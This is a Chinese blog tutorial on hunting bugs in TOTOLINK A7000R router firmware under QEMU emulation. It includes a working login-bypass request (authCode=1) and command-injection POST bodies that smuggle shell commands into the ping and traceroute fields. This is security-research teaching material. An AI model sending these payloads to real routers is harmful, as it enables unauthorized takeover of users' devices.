<!DOCTYPE html>


<html lang="zh">
  

    <head>
      <meta charset="utf-8" />
        
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>路由器挖掘基础教程-by-HRP |  H.greed</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="https://user-images.githubusercontent.com/72968793/136398013-abf88785-b056-4f51-aa15-a8ee261f5c7f.jpg" />
       
<link rel="stylesheet" href="/dist/main.css">

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css"
      />
      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-路由器挖掘基础教程-by-HRP"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  路由器挖掘基础教程-by-HRP
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2023/08/02/%E8%B7%AF%E7%94%B1%E5%99%A8%E6%8C%96%E6%8E%98%E5%9F%BA%E7%A1%80%E6%95%99%E7%A8%8B-by-HRP/" class="article-date">
  <time datetime="2023-08-02T02:35:44.000Z" itemprop="datePublished">2023-08-02</time>
</a>   
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">4.3k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">20 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="路由器挖掘基础教程-by-HRP"><a href="#路由器挖掘基础教程-by-HRP" class="headerlink" title="路由器挖掘基础教程-by-HRP"></a>路由器挖掘基础教程-by-HRP</h1><span id="more"></span>

<h2 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h2><p>1.Ubuntu22.04</p>
<p>2.qemu-system-mipsel</p>
<p>3.IDA 7.1</p>
<p>4.burpsuite</p>
<p>5.binwalk</p>
<p>6.适配hda与kernel</p>
<h3 id="第一步：内核与hda下载"><a href="#第一步：内核与hda下载" class="headerlink" title="第一步：内核与hda下载"></a>第一步：内核与hda下载</h3><p><a target="_blank" rel="noopener" href="https://people.debian.org/~aurel32/qemu/">https://people.debian.org/~aurel32/qemu/</a></p>
<p>自行根据路由器架构选择，一般搭配如下，以mipsel举例</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">debian_squeeze_mipsel_standard.qcow2 </span><br><span class="line"></span><br><span class="line">vmlinux-2.6.32-5-4kc-malta</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>hda要选择squeeze的，kernel选择最小版本的2.6的</p>
<h3 id="第二步：配置网卡"><a href="#第二步：配置网卡" class="headerlink" title="第二步：配置网卡"></a>第二步：配置网卡</h3><p>ifconfig查看宿主机eth0网段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500</span><br><span class="line">        inet 172.28.60.132  netmask 255.255.240.0  broadcast 172.28.63.255</span><br></pre></td></tr></table></figure>

<p>创建一张新的网卡tap0，和桥接如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 创建一个tap设备并启动它</span><br><span class="line">tunctl -t tap0 -u root</span><br><span class="line">ip link set tap0 up</span><br><span class="line"></span><br><span class="line"># 创建一个新的网络桥，并将tap设备添加进去</span><br><span class="line">brctl addbr br0</span><br><span class="line">brctl addif br0 tap0</span><br><span class="line"></span><br><span class="line"># 给br0分配IP地址</span><br><span class="line">ip addr add 192.168.200.1/24 dev br0</span><br><span class="line">ip link set br0 up</span><br></pre></td></tr></table></figure>



<h2 id="正式教学"><a href="#正式教学" class="headerlink" title="正式教学"></a>正式教学</h2><p>本教程以totolink为主要教学目标，因为totolink太好挖了x</p>
<p>第一步上官网选取固件</p>
<p><a target="_blank" rel="noopener" href="https://www.totolink.net/home/news/me_name/id/39/menu_listtpl/DownloadC.html">https://www.totolink.net/home/news/me_name/id/39/menu_listtpl/DownloadC.html</a></p>
<p>tips：官网列出的不一定就是全部，有些下架的产品可以自己在id后面的路径改改也可以出来</p>
<h3 id="案例一：A7000R-V9-1-0u-6115-B20201022登录绕过"><a href="#案例一：A7000R-V9-1-0u-6115-B20201022登录绕过" class="headerlink" title="案例一：A7000R V9.1.0u.6115_B20201022登录绕过"></a>案例一：A7000R V9.1.0u.6115_B20201022登录绕过</h3><p>这里先说下，当你要挖一个路由器的时候，先在<a target="_blank" rel="noopener" href="https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/171/ids/36.html">https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/171/ids/36.html</a></p>
<p>搜索你要挖的路由器的名字，然后自己对应版本去看 是否有人挖过了。如果有，不要立马放弃，路由器的洞基本上是连串的（因为模块是共用的有些），这个被挖了不代表别的产品被挖了，而且挖了不一定修复，可以下次等新产品或者固件出来再上手梭哈。所以这个list是非常有参考价值的。</p>
<h4 id="第一步：CVE-list搜索"><a href="#第一步：CVE-list搜索" class="headerlink" title="第一步：CVE list搜索"></a>第一步：CVE list搜索</h4><p>我们本次的案例一A7000R登录绕过（是来自于风间映川师傅，我嫖了x） 如下list，登录绕过还没有人交，我提交了但是不知道什么时候能下来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">CVE-2022-37084	TOTOLINK A7000R V9.1.0u.6115_B20201022被发现通过 addEffect 函数中的 sPort 参数包含堆栈溢出。</span><br><span class="line">CVE-2022-37083	TOTOLINK A7000R V9.1.0u.6115_B20201022通过函数 setDiagnostic Cfg 中的 ip 参数发现包含命令注入漏洞。</span><br><span class="line">CVE-2022-37082	TOTOLINK A7000R V9.1.0u.6115_B20201022通过函数 NTPSyncWithHost 中的 host_time 参数发现包含命令注入漏洞。</span><br><span class="line">CVE-2022-37081	TOTOLINK A7000R V9.1.0u.6115_B20201022通过 setting/setTracerouteCfg 中的命令参数发现包含命令注入漏洞。</span><br><span class="line">CVE-2022-37080	TOTOLINK A7000R V9.1.0u.6115_B20201022通过 settings/setTracerouteCfg 中的命令参数发现包含堆栈溢出。</span><br><span class="line">CVE-2022-37079	TOTOLINK A7000R V9.1.0u.6115_B20201022通过函数 setOpModeCfg 中的 hostName 参数发现包含一个命令注入漏洞。</span><br><span class="line">CVE-2022-37078	TOTOLINK A7000R V9.1.0u.6115_B20201022通过 /setting/setLanguageCfg 中的 lang 参数发现包含一个命令注入漏洞。</span><br><span class="line">CVE-2022-37077	TOTOLINK A7000R V9.1.0u.6115_B20201022被发现包含通过 pppoeUser 参数的堆栈溢出。</span><br><span class="line">CVE-2022-37076	TOTOLINK A7000R V9.1.0u.6115_B20201022通过函数 UploadFirmwareFile 中的 FileName 参数发现包含一个命令注入漏洞。</span><br><span class="line">CVE-2022-37075	TOTOLink A7000R V9.1.0u.6115_B20201022被发现通过函数 setDiagnostic Cfg 中的 ip 参数包含堆栈溢出。</span><br><span class="line">CVE-2022-32993	TOTOLINK A7000R V4.1cu.4134 被发现包含通过 /cgi-bin/ExportSettings.sh 的访问控制问题。</span><br><span class="line">CVE-2022-27005	Totolink路由器的X5000R V9.1.0u.6118_B20201102和A7000R V9.1.0u.6115_B20201022被发现通过hostName参数在setWanCfg函数中包含命令注入漏洞。此漏洞允许攻击者通过构建的请求执行任意命令。</span><br><span class="line">CVE-2022-27004	通过remote5000in9参数发现Totolink路由器的X1R V0.6118.20201102u.7000_B9和A1R V0.6115.20201022u.6_B4在隧道6in4函数中包含命令注入漏洞。此漏洞允许攻击者通过构建的请求执行任意命令。</span><br><span class="line">CVE-2022-27003	Totolink 路由器的 X5000R V9.1.0u.6118_B20201102 和 A7000R V9.1.0u.6115_B20201022被发现通过 relay6rd 参数在隧道 6rd 函数中包含命令注入漏洞。此漏洞允许攻击者通过构建的请求执行任意命令。</span><br></pre></td></tr></table></figure>

<h4 id="第二步：下载对应版本的固件，分解，目录结构学习"><a href="#第二步：下载对应版本的固件，分解，目录结构学习" class="headerlink" title="第二步：下载对应版本的固件，分解，目录结构学习"></a>第二步：下载对应版本的固件，分解，目录结构学习</h4><p>案例一选择的是</p>
<p>A7000R_Firmware V9.1.0u.6115_B20201022(Transition version) 2020-12-30 </p>
<p>我们已经下载好了，直接用binwalk开始分解</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">binwalk --run-as=root -Me TOTOLINK_C8340R-1C_A7000R_IP04349_MT7621A_SPI_16M128M_V9.1.0u.6115_B20201022_ALL.web --preserve-symlinks</span><br></pre></td></tr></table></figure>

<p>分解之后我们得到了如下目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_TOTOLINK_C8340R-1C_A7000R_IP04349_MT7621A_SPI_16M128M_V9.1.0u.6115_B20201022_ALL.web.extracted</span><br></pre></td></tr></table></figure>

<p>在这个目录里面有一个squashfs-root目录，这是我们路由器固件的核心目录，在这个目录，我们重点关注的一般就是</p>
<p>/bin /usr/bin /usr/sbin /www /web /web/cgi-bin</p>
<p>bin目录和sbin目录主要是存放了httpd服务器，用来启动路由器服务</p>
<p>www和web目录存放了主要的网页</p>
<p>cgi-bin目录存放的就是我们漏洞挖掘的核心-cgi</p>
<p>tips：有时候也可以挖httpd服务或者别的内置的网络服务</p>
<h4 id="第三步：启动qemu，上传固件目录，简单配置以及启动路由器"><a href="#第三步：启动qemu，上传固件目录，简单配置以及启动路由器" class="headerlink" title="第三步：启动qemu，上传固件目录，简单配置以及启动路由器"></a>第三步：启动qemu，上传固件目录，简单配置以及启动路由器</h4><p>qemu启动命令如下，默认用户名和密码都是root</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-mipsel -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mipsel_standard.qcow2 -append &quot;root=/dev/sda1 console=tty0&quot; -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic</span><br></pre></td></tr></table></figure>

<p>现在进来了对eth0网卡先分配个ip（qemu内）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ifconfig eth0 192.168.200.1</span><br></pre></td></tr></table></figure>

<p>压缩固件目录（宿主机）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar -czvf 1.tar squashfs-root/</span><br></pre></td></tr></table></figure>

<p>配置Nginx代理（宿主机）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">server &#123;</span><br><span class="line">    listen 80;</span><br><span class="line">    server_name 172.28.60.132;</span><br><span class="line"></span><br><span class="line">    location / &#123;</span><br><span class="line">        proxy_pass http://192.168.200.2;</span><br><span class="line">        proxy_set_header Host $host;</span><br><span class="line">        proxy_set_header X-Real-IP $remote_addr;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">server &#123;</span><br><span class="line">    listen 80;</span><br><span class="line">    server_name 192.168.200.2;</span><br><span class="line"></span><br><span class="line">    location / &#123;</span><br><span class="line">        proxy_pass http://172.28.60.132;</span><br><span class="line">        proxy_set_header Host $host;</span><br><span class="line">        proxy_set_header X-Real-IP $remote_addr;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>scp上传（宿主机）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scp -oHostKeyAlgorithms=+ssh-rsa  1.tar root@192.168.200.2:/root</span><br></pre></td></tr></table></figure>

<p>解压缩（qemu内）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar -zxvf 1.tar</span><br></pre></td></tr></table></figure>

<p>挂载（qemu内）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mount -o bind /dev ./squashfs-root/dev</span><br><span class="line"></span><br><span class="line">mount -t proc /proc ./squashfs-root/proc/</span><br></pre></td></tr></table></figure>

<p>chroot（qemu内）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chroot ./squashfs-root/ sh</span><br></pre></td></tr></table></figure>

<p>启动httpd服务器</p>
<p>tips：本案例用的是Lighttpd服务器的路由器，有的是shttpd(在/usr/sbin)，一般httpd服务器就在各大bin或者sbin还有根目录下，自己根据提示逐步配置。这里简单带一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/ # lighttpd -f lighttp/lighttpd.conf</span><br><span class="line">2023-07-26 02:28:27: (server.c.624) opening pid-file failed: /var/run/lighttpd.pid No such file or directory</span><br><span class="line">/ #</span><br></pre></td></tr></table></figure>

<p>可以看见这里有个简单报错找不到文件，直接创建就好了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/ # mkdir /var/run</span><br><span class="line">/ # touch /var/run/lighttpd.pid</span><br></pre></td></tr></table></figure>

<p>然后再进行启动</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/ # lighttpd -f lighttp/lighttpd.conf</span><br><span class="line">/ # 2023-07-26 02:29:12: (log.c.97) server started</span><br></pre></td></tr></table></figure>

<p>刚才已经进行过了Nginx代理，现在访问宿主机的eth0网卡即可</p>
<img src="D:/hrp自命题/路由器CVE挖掘记录/路由器挖掘基础教程-by-HRP/img/1.jpg">

<h4 id="第四步：漏洞挖掘思路-登录绕过"><a href="#第四步：漏洞挖掘思路-登录绕过" class="headerlink" title="第四步：漏洞挖掘思路-登录绕过"></a>第四步：漏洞挖掘思路-登录绕过</h4><p>这里直接上BP抓包先看看反应</p>
<p>第一个包如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST /cgi-bin/cstecgi.cgi HTTP/1.1</span><br><span class="line">Host: 172.28.60.132</span><br><span class="line">Content-Length: 127</span><br><span class="line">Accept: application/json, text/javascript, */*; q=0.01</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</span><br><span class="line">Content-Type: application/x-www-form-urlencoded; charset=UTF-8</span><br><span class="line">Origin: http://172.28.60.132</span><br><span class="line">Referer: http://172.28.60.132/login.html</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">&#123;&quot;username&quot;:&quot;21232f297a57a5a743894a0e4a801fc3&quot;,&quot;password&quot;:&quot;c4ca4238a0b923820dcc509a6f75849b&quot;,&quot;flag&quot;:&quot;0&quot;,&quot;topicurl&quot;:&quot;loginAuth&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>用户名密码都是md5加密的，flag是标志phone还是PC，我们关注topicurl这个，这个变量是totolink的接口识别用的，可以看见现在在调用登录鉴权，先去cgi看看搜索loginauth</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Address	Length	Type	String</span><br><span class="line">.rodata:00439880	0000000D	C	loginAuthUrl</span><br><span class="line">.rodata:00439978	00000063	C	,\&quot;redirectURL\&quot;:\&quot;http://%s/formLoginAuth.htm?authCode=%d&amp;userName=%s&amp;goURL=%s&amp;action=login&amp;flag=1\&quot;&#125;</span><br><span class="line">.rodata:004399DC	00000065	C	,\&quot;redirectURL\&quot;:\&quot;http://%s/formLoginAuth.htm?authCode=%d&amp;userName=%s&amp;goURL=%s&amp;action=login&amp;flag=ie8\&quot;&#125;</span><br><span class="line">.rodata:00439A44	0000005C	C	,\&quot;redirectURL\&quot;:\&quot;http://%s/formLoginAuth.htm?authCode=%d&amp;userName=%s&amp;goURL=%s&amp;action=login\&quot;&#125;</span><br><span class="line">.rodata:0043A2B4	00000041	C	&#123;\&quot;topicurl\&quot;:\&quot;loginAuth\&quot;,\&quot;loginAuthUrl\&quot;:\&quot;%s&amp;http_host=%s&amp;flag=1\&quot;&#125;</span><br><span class="line">.rodata:0043A2F8	0000003A	C	&#123;\&quot;topicurl\&quot;:\&quot;loginAuth\&quot;,\&quot;loginAuthUrl\&quot;:\&quot;%s&amp;http_host=%s\&quot;&#125;</span><br><span class="line">.rodata:0043A450	00000043	C	&#123;\&quot;topicurl\&quot;:\&quot;loginAuth\&quot;,\&quot;loginAuthUrl\&quot;:\&quot;%s&amp;http_host=%s&amp;flag=ie8\&quot;&#125;</span><br><span class="line">.data:0044D3F4	0000000A	C	loginAuth</span><br></pre></td></tr></table></figure>

<p>可以看见调用了</p>
<p>formLoginAuth.htm这种htm的要么就是明确的文件要么就是塞在httpd服务的，这里我直接说了就是塞在了httpd服务的</p>
<p>我们去看看lighttpd的Form_Login函数</p>
<p>关键节选如下，分析后很容易看出来他有个变量是authCode，只要这个是1就分配session，然后还有个重定向goURL，这个直接改到home去就行了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">if ( getNthValueSafe(0, v23, 61, v20) != -1 &amp;&amp; getNthValueSafe(1, v23, 61, v8) != -1 )</span><br><span class="line">     &#123;</span><br><span class="line">       if ( strstr(v20, &quot;authCode&quot;) )</span><br><span class="line">         v7 = atoi(v8);</span><br><span class="line">       if ( strstr(v20, &quot;userName&quot;) )</span><br><span class="line">         strcpy(v30, v8);</span><br><span class="line">       if ( strstr(v20, &quot;password&quot;) )</span><br><span class="line">         strcpy(v29, v8);</span><br><span class="line">       if ( strstr(v20, &quot;goURL&quot;) )</span><br><span class="line">         strcpy(v28, v8);</span><br><span class="line">       if ( strstr(v20, &quot;flag&quot;) )</span><br><span class="line">         strcpy(v27, v8);</span><br><span class="line">     &#125;</span><br><span class="line">     v9 = (int)v25;</span><br><span class="line">   &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> if ( !v19[0] )</span><br><span class="line"> &#123;</span><br><span class="line">   if ( strstr(&amp;v13, &quot;ie8&quot;) )</span><br><span class="line">   &#123;</span><br><span class="line">     v10 = &quot;wan_ie.html&quot;;</span><br><span class="line">   &#125;</span><br><span class="line">   else if ( atoi(&amp;v13) == 1 )</span><br><span class="line">   &#123;</span><br><span class="line">     v10 = &quot;phone/home.html&quot;;</span><br><span class="line">   &#125;</span><br><span class="line">   else</span><br><span class="line">   &#123;</span><br><span class="line">     v10 = &quot;home.html&quot;;</span><br><span class="line">   &#125;</span><br><span class="line">   strcpy(v19, v10);</span><br><span class="line"> &#125;</span><br><span class="line"> if ( v7 )</span><br><span class="line"> &#123;</span><br><span class="line">   fbss = 0;</span><br><span class="line">   do</span><br><span class="line">   &#123;</span><br><span class="line">     v12 = time(0);</span><br><span class="line">     if ( !ws_get_cookie(a1, &quot;SESSION_ID&quot;, v15, 0) &amp;&amp; form_get_idx_by_sessionid(&amp;fl_sess, v12, v15) != -1 )</span><br></pre></td></tr></table></figure>

<p>分析后poc如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">GET /formLoginAuth.htm?authCode=1&amp;userName=&amp;goURL=home.html&amp;action=login HTTP/1.1</span><br><span class="line">Host: 172.28.60.132</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line">Referer: http://172.28.60.132/login.html?timestamp=1690291900</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: SESSION_ID=2:1690291900:2</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>直接绕过登录，而且数据流程和正常登录的一模一样。</p>
<p>到此，案例一结束。</p>
<h3 id="案例二：A7000R-V9-1-0u-6115-B20201022命令执行"><a href="#案例二：A7000R-V9-1-0u-6115-B20201022命令执行" class="headerlink" title="案例二：A7000R V9.1.0u.6115_B20201022命令执行"></a>案例二：A7000R V9.1.0u.6115_B20201022命令执行</h3><p>刚才我们讲了基本的绕过思路，结束抓包看cgi行为再去看具体的httpd服务器行为。现在我们在常见的接口来进行命令执行测试。</p>
<p>常见的接口，路由配置，ping测试，语言设置，密码更换，文件上传，文件下载都有可能是可以注入的点。</p>
<p>在这我们先来进行ping注入，</p>
<img src="D:/hrp自命题/路由器CVE挖掘记录/路由器挖掘基础教程-by-HRP/img/2.png">



<p>来抓包，改成如下用反引号拼接</p>
<p>POC</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /cgi-bin/cstecgi.cgi HTTP/1.1</span><br><span class="line">Host: 172.28.60.132</span><br><span class="line">Content-Length: 77</span><br><span class="line">Accept: application/json, text/javascript, */*; q=0.01</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</span><br><span class="line">Content-Type: application/x-www-form-urlencoded; charset=UTF-8</span><br><span class="line">Origin: http://172.28.60.132</span><br><span class="line">Referer: http://172.28.60.132/advance/diagnosis.html?timestamp=1690341567262</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: SESSION_ID=2:1690339658:2</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">&#123;&quot;ip&quot;:&quot;127.0.0.1`ls&gt;/www/HRP666.txt`&quot;,&quot;num&quot;:&quot;4&quot;,&quot;topicurl&quot;:&quot;setDiagnosisCfg&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>结果</p>
<img src="D:/hrp自命题/路由器CVE挖掘记录/路由器挖掘基础教程-by-HRP/img/3.png">

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/www # cat HRP666*</span><br><span class="line">ExportSettings.sh</span><br><span class="line">cstecgi.cgi</span><br><span class="line">custom.cgi</span><br></pre></td></tr></table></figure>

<p>现在换下个接口，路由配置</p>
<img src="D:/hrp自命题/路由器CVE挖掘记录/路由器挖掘基础教程-by-HRP/img/4.png">

<p>都差不多的，这里用分号拼接。tips：避免后续本身自带的输出重定向导致无回显，可以在结尾再加一个分号</p>
<p>POC</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /cgi-bin/cstecgi.cgi HTTP/1.1</span><br><span class="line">Host: 172.28.60.132</span><br><span class="line">Content-Length: 80</span><br><span class="line">Accept: application/json, text/javascript, */*; q=0.01</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</span><br><span class="line">Content-Type: application/x-www-form-urlencoded; charset=UTF-8</span><br><span class="line">Origin: http://172.28.60.132</span><br><span class="line">Referer: http://172.28.60.132/advance/traceroute.html?timestamp=1690339677465</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: SESSION_ID=2:1690339658:2</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">&#123;&quot;command&quot;:&quot;127.0.0.1;ls&gt;/www/hrp.txt;&quot;,&quot;num&quot;:&quot;4&quot;,&quot;topicurl&quot;:&quot;setTracerouteCfg&quot;&#125;</span><br></pre></td></tr></table></figure>

<img src="D:/hrp自命题/路由器CVE挖掘记录/路由器挖掘基础教程-by-HRP/img/5.jpg">



<p>至此案例二结束。</p>
